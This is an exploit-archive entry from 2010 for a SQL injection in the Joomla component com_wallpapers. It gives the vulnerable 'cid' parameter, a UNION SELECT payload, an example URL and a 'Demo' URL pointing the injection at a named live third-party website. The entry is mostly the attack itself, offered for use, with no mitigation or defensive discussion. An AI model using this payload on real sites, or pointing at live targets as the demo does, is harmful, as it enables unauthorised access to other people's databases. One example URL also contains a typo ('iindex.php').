Joomla Component com_wallpapers SQL Injection Vulnerability

2010-03-24T00:00:00
ID 1337DAY-ID-11429
Type zdt
Reporter DevilZ TM
Modified 2010-03-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Joomla Component com_wallpapers SQL Injection Vulnerability
===========================================================


# Title : Joomla Component com_wallpapers SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-24

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_wallpapers SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : [email protected]
[~] Contact   : [email protected]
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_wallpapers&act=albums&cid=[SQL]
 
[~] ExploiT         :
 
-1+UNION+SELECT+1--
 
[~] Example         :
 
http://127.0.0.1/iindex.php?option=com_wallpapers&act=albums&cid=-1+UNION+SELECT+1--

[~] Demo            :

http://www.hq-wallpapers.com/index.php?option=com_wallpapers&act=albums&cid=-1+UNION+SELECT+1--




#  0day.today [2018-01-05]  #